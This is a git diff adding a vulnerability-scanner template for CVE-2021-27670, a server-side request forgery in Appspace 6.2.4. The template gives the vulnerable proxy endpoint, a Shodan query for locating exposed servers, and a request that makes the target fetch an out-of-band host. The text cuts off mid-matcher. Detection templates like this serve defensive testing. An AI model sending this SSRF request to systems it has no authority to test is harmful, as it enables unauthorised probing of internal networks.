diff --git a/http/cves/2021/CVE-2021-27670.yaml b/http/cves/2021/CVE-2021-27670.yaml new file mode 100644 index 0000000000..fc1c5b4846 --- /dev/null +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-27670 + +info: + name: Appspace 6.2.4 - Server-Side Request Forgery + author: ritikchaddha + severity: high + description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter. + reference: + - https://github.com/h3110mb/PoCSSrfApp + - https://nvd.nist.gov/vuln/detail/CVE-2021-27670 + classification: + cve-id: CVE-2021-27670 + metadata: + max-request: 1 + verified: true + shodan-query: title:"Appspace" + tags: cve,cve2023,appspace,ssrf + +http: + - method: GET + path: + - '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "